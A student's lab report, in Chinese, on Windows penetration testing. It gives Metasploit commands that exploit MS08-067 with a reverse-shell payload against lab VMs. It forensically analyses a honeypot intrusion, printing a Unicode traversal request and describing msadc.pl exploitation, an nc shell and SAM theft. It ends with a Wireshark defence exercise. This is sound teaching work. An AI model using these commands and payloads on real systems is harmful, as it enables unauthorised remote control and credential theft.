目录
1.实践内容
-
动手实践Metasploit windows attacker:使用metasploit软件进行windows远程渗透统计实验
-
取证分析实践:解码一次成功的NT系统破解攻击,并分析攻击的全部过程
-
团队对抗实践:windows系统远程渗透攻击和分析
- 攻方使用metasploit选择漏洞进行攻击
- 防守方使用wireshark监听获得的网络数据包
2.实践过程
2.1.动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
本次任务的实验环境如下表所示
虚拟机分类 | 虚拟机名称 | IP |
---|---|---|
攻击机 | Kali | 192.168.200. 3 |
靶机 | Win2KServer | 192.168.200.124 |
-
在kali中输入命令
msfconsole
打开Metasploit
-
在打开的
Metasploit
中输入命令search ms08_067
搜索该漏洞
根据搜索结果可知,在exploit/windows/smb
路径下有一个ms08_067_netapi
漏洞文件 -
输入命令
use windows/smb/ms08_067_netapi
使用该漏洞文件
- 输入命令
show options
查看该漏洞的模块选项和载荷选项
- 输入命令
show payloads
显示可用的攻击载荷信息
- 输入命令
-
将第四个载荷
payload/generic/shell_reverse_tcp
作为攻击载荷-
使用命令
set payload generic/shell_reverse_tcp
设置攻击的载荷
-
使用
show options
查看需要设置的参数
-
使用
set RHOST 192.168.200.124
设置渗透攻击的Win2K靶机的IP
-
使用
set LHOST 192.168.200.3
设置渗透攻击的Kali主机的IP
-
最后使用
show options
查看是否设置成功
根据options
中显示的RHOST
和LHOST
的地址可知已设置成功
-
-
输入命令
exploit
实施渗透攻击
可以看到成功建立了连接,我们拥有了对Win2K靶机的控制权,攻击成功 -
输入命令
ipconfig
查看ip地址信息
可见ip地址为192.168.200.124
,确实为靶机Win2k的ip地址
2.2 取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
-
在学习通中下载
demo_NT_attack_data.zip
,内含snort-0204@0117.log
文件,将该文件传到Kali中 -
在Kali中,右键
snort-0204@0117.log
文件,选择Open With Other Application
,在弹出的窗口中选择Wireshark
,即使用Wireshark打开该文件
-
打开后可以看到有非常多的报文,输入
ip.dst == 172.16.1.106 and http
对报文进行筛选
-
117
号数据包的描述信息中有一些%C0%AF
的字符,右键该数据包选择Follow - TCP Stream
,对该数据包进行跟踪
请求路径为/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini
,其中%C0%AF
为Unicode编码
,由此推断攻击者进行了Unicode攻击以打开boot.ini文件 -
继续查看HTTP数据包,发现在
149
号数据包中攻击者探测了/msadc/msadcs.dll
文件,我们跟踪该数据包的TCP流
我们可以看到数据包中有shell语句,使用dbg=c:\winnt\help\iis\htmtutorial\btcustmr.mdb
进行查询,并且出现了ADM!ROX!YOUR!WORLD
特征字符串,查阅资料可知,这是由rain forest puppy
编写的msadc(2).pl
代码发起的渗透攻击
至此,攻击者确认了目标系统提供Web服务的是ⅡSv4.0
,并存在Unicode
和RDS
漏洞
- 确定了攻击者使用的是
msadc(2).pl
渗透代码后,我们使用http.request.uri contains "msadc"
进行筛选
- 跟踪
3661
号数据包,发现攻击者通过nc
构建了一个远程shell通道,并连接6969
端口,获得了访问权,进入了交互式控制阶段
- 继续跟踪
- 攻击者查看文件
- 攻击者删除
ftpcom
文件
- 攻击者尝试获取密码,查看用户组并添加用户
- 尝试获取管理员权限
- 而后又尝试获取SAM备份,
rdisk -s
备份关键系统信息,创建了一个名为sam._
的SAM
副本
- 获取到SAM的数据,写入文件
har.txt
- 攻击者发现这是一台蜜罐主机,并称这是他见过的最好的蜜罐主机
- 攻击者查看文件
问:攻击者使用了什么破解工具进行攻击?
答:攻击者对Unicode漏洞使用了Unicode攻击,并对msadcs.dll的RDS漏洞使用msadc.pl渗透工具进行攻击
问:攻击者如何使用这个破解工具进入并控制了系统?
答:攻击者首先通过Unicode漏洞对目标主机进行了信息搜集,掌握了操作系统的基本情况。然后又利用了msadcs.dll文件中的RDS漏洞,实施了SQL注入攻击。通过这一系列复杂的操作,攻击者最终成功地获得了系统的访问权限,并为自己创建了一个具有高权限的用户账户,从而实现了对目标系统的控制。
问:攻击者获得系统访问权限后做了什么
答:在成功获取系统权限后,攻击者继续尝试提升权限。尝试获取SAM的数据(写入har.txt),并尝试修改系统管理员组,以此来提高自己的访问权限。
问:我们如何防止这样的攻击
答:1.定期更新系统:确保操作系统和所有软件都安装了最新的安全补丁。
2.最小权限原则:为用户和应用程序分配最小必要的权限,以减少攻击者可利用的权限范围。
3.网络隔离:将关键系统和服务隔离在受保护的网络区域中,以减少潜在的攻击面。
4.入侵检测系统:部署入侵检测系统(IDS)和入侵防御系统(IPS)来监控和阻止可疑活动。
5.数据备份:定期备份关键数据,以防万一系统受到攻击,可以快速恢复。
问:你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
答:是的,后面攻击者已经发现了他的目标是一台蜜罐主机,并在rfp.txt文件中称这是他见过的最好的蜜罐主机
2.3 团队对抗实践:windows系统远程渗透攻击和分析
2.3.1 攻击实践
虚拟机分类 | 虚拟机名称 | IP |
---|---|---|
攻击机(吴锦龙20232803) | Kali | 192.168.151. 98 |
靶机(张哲20232807) | Win2KServer | 192.168.151.65 |
-
将两台虚拟机的网络都改为
桥接模式
,然后查看两台虚拟机的ip地址,检查是否在同一网段- 查看攻击机的ip地址
- 查看靶机的ip地址
攻击机的ip为192.168.151. 98
,靶机的ip为192.168.151. 65
,确认在同一网段下,可以进行下一步实践
- 查看攻击机的ip地址
-
在kali中输入命令
msfconsole
打开Metasploit
-
输入命令
use windows/smb/ms08_067_netapi
使用该漏洞文件
- 输入
show payloads
显示可用的攻击载荷
- 输入
-
将第四个载荷
payload/generic/shell_reverse_tcp
作为攻击载荷- 输入
set payload generic/shell_reverse_tcp
设置攻击载荷,实现反向连接
- 输入
show options
查看需要设置的参数
- 设置
LHOST
为攻击机的ip,设置RHOST
为靶机的ip
- 设置好后再输入
show options
检查是否设置成功
- 输入
-
输入
exploit
实施攻击
可以看到,我们已经成功获取了靶机的控制台- 查看ip,确认是靶机,然后尝试创建一个文件夹
- 查看ip,确认是靶机,然后尝试创建一个文件夹
-
在靶机中可以查看到刚才创建的文件夹,说明攻击成功!
2.3.2 防御实践
虚拟机分类 | 虚拟机名称 | IP |
---|---|---|
攻击机(张哲20232807) | Kali | 192.168.151. 10 |
靶机(吴锦龙20232803) | Win2KServer | 192.168.151.53 |
- 将靶机Win2K的网络改为
桥接模式
,查看ip地址
注:靶机Win2K改为
桥接模式
后,可能出现与攻击机ip仍不在同一网段的情况,具体解决方案在3.学习中遇到的问题及解决
中
- 被攻击方攻击后,在自己的文件夹中出现了攻击者创建的文件夹
- 使用Wireshark抓包,跟踪TCP流能够看到攻击者进行的一系列操作
3. 学习中遇到的问题及解决
- 问题描述:靶机Win2K的网络改为
桥接模式
后,靶机的ip地址与攻击机不在同一网段 - 解决方案:在Win2K中,依次打开
控制面板 - 网络和拨号连接 - 本地连接 - 属性 - Internet协议(TCP/IP) - 属性
,将IP地址和DNS地址都改为自动获得
4. 学习感悟
- 通过动手实践Metasploit,我深刻体会到了Metasploit的强大之处,Metasploit作为一个渗透测试框架,提供了丰富的漏洞利用模块,让我能够模拟真实的攻击场景。在攻击过程中,我更加深入地理解了操作系统和应用程序中的漏洞是如何被利用的。
- 通过解码和分析NT系统破解攻击,我认识到了取证分析在网络安全中的作用。这有助于我理解攻击者的行为模式,并学习了如何通过日志和网络流量分析来追踪和预防攻击。
- 在团队对抗实践中,我体会到了团队合作的重要性。作为攻击方,我需要精心策划和执行攻击;而作为防守方,我学会了使用工具如Wireshark来监控网络流量,寻找潜在的威胁。